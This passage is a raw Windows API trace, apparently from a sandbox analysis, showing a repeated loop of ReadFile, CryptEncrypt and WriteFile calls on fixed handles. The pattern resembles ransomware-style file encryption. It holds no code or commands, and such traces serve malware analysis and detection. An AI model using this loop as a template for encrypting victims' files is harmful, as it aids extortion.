lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.501] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.501] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.502] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.502] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, 